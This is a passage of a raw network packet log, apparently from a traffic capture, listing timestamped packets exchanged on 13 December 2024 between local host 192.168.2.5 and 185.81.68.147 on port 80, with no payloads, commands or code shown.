                                                                                                                                                                Dec 13, 2024 01:37:36.091095924 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.091123104 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.091136932 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.091162920 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.091200113 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.091232061 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.091258049 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.091275930 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.091301918 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.091322899 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.091358900 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.091372967 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.091397047 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.091411114 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.091438055 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.091461897 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.091485977 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.091500044 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.091522932 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.091538906 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.091792107 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.091814041 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.091856956 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.091875076 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.091903925 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.091929913 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.091948032 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.091965914 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.091993093 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.092005968 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.092039108 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.092055082 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.092082024 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.092097044 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.092253923 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.092303038 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.092374086 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.092396975 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.092415094 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.092442989 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.092504978 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.092539072 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.092554092 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.092617989 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.092653036 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.092684984 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.092709064 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.092722893 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.092744112 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.092758894 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.092789888 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.092817068 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.092844009 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.093048096 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.093075037 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.093142986 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.093151093 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.093158007 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.093166113 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.093199015 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.093208075 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.093214989 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.093645096 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.093750000 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.093765020 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.093790054 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.093848944 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.093873978 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.093887091 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.093911886 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.093946934 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.093966007 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.094001055 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.094043016 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.094063997 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.094094992 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.094116926 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.094141006 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.094315052 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.094362020 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.094376087 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.094398975 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.094413996 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.094443083 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.094459057 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.094486952 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.094511986 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.094538927 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.094563961 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.094588995 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.094604015 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.094629049 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.094652891 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.094676018 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.094705105 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.094825983 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.094840050 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.094861031 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.094877005 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.094944000 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.094979048 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.094994068 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.095083952 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.095083952 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.095109940 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.095124006 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.095145941 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.095174074 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.095199108 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.095221996 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.095241070 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.095258951 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.095278978 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.095304966 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.095326900 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.095340014 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.095356941 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.095381975 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.095401049 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.095422029 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.095437050 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.095459938 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.095639944 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.095664024 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.095679998 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.095701933 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.095716953 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.095736980 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.095760107 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.095774889 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.095802069 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.095818996 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.095839024 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.095865965 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.095880032 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.095899105 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.095913887 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.095933914 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.095953941 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.095973015 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.096066952 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.096081018 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.096101999 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.096120119 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.096187115 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.096218109 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.096235037 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.096256971 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.096312046 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.096335888 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.096349955 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.096380949 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.096410036 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.096445084 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.096465111 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.096479893 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.096503019 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.096517086 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.096548080 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.096560955 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.096584082 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.096607924 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.096622944 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.096723080 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.096745968 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.096777916 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.096805096 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.096820116 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.096857071 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.096874952 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.096899986 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.096913099 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.096941948 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.096966982 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.096987963 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.097001076 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.097031116 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.097045898 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.097076893 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.097093105 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.097125053 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.097208023 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.097242117 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.097270966 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.097289085 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.097306967 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.097327948 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.097342968 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.097426891 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.097453117 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.097467899 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.097491980 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.097551107 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.097577095 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.097596884 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.097620964 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.097696066 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.097696066 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.097723961 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.097738028 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.097768068 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.097781897 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.097809076 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.097832918 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.097856045 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.098038912 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.098067999 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.098088980 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.098124981 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.098144054 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.098161936 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.098181963 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.098205090 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.098231077 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.098247051 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.098268032 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.098282099 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.098301888 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.098328114 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.098341942 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.098365068 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.098382950 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.098409891 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.098448992 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.098975897 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.099000931 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.099014044 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.099123001 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.099196911 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.099220037 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.099247932 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.099263906 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.099289894 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.099450111 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.099472046 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.099484921 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.099519014 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.099534988 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.099565983 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.099580050 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.099603891 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.099617958 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.099642038 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.099659920 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.099684954 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.099699020 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.099721909 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.099736929 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.099764109 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.099777937 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.099807978 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.099824905 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.099848986 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.099864960 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.099890947 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.099908113 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.100032091 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.100050926 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.100078106 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.100092888 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.100114107 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.100179911 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.100213051 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.100238085 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.100260973 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.100320101 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.100347996 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.100362062 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.100394964 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.100502014 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.100517035 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.100543022 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.100558043 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.100591898 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.100608110 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.100636959 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.100841999 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.100871086 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.100898981 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.100927114 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.100940943 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.100966930 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.100982904 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.101017952 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.101031065 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.101058960 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.101073027 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.101099014 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.101125956 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.101150036 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.101162910 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.101190090 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.101205111 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.101351976 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.101392984 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.101417065 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.101505041 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.101541042 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.101634026 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.101634026 CET4977580192.168.2.5185.81.68.147
